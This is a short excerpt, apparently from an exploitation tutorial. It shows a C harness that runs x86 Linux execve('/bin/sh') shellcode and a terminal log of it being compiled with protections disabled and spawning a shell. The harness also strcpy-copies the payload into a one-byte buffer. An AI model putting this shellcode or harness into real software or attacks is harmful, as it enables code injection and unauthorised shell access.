...
Code Block | ||||
---|---|---|---|---|
| ||||
#include<stdio.h> #include<string.h> unsigned char shellcode [] = "\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\x8d\x4b\x08\x8d\x53\x0c\xb0\x0b\xcd\x80\xe8\xe5\xff\xff\xff/bin/sh"; unsigned char code[] = ""; void main(){ int len = strlen(shellcode); printf("Shellcode len : %d\n",len); strcpy(code,shellcode); (*(void(*)()) code)(); } |
...
Code Block | ||
---|---|---|
| ||
lazenca0x0@ubuntu:~/Shell$ gcc -o testshell2 -fno-stack-protector -z execstack --no-pie -m32 testshell2.c lazenca0x0@ubuntu:~/Shell$ ./testshell2 Shellcode len : 36 $ id uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) $ |
...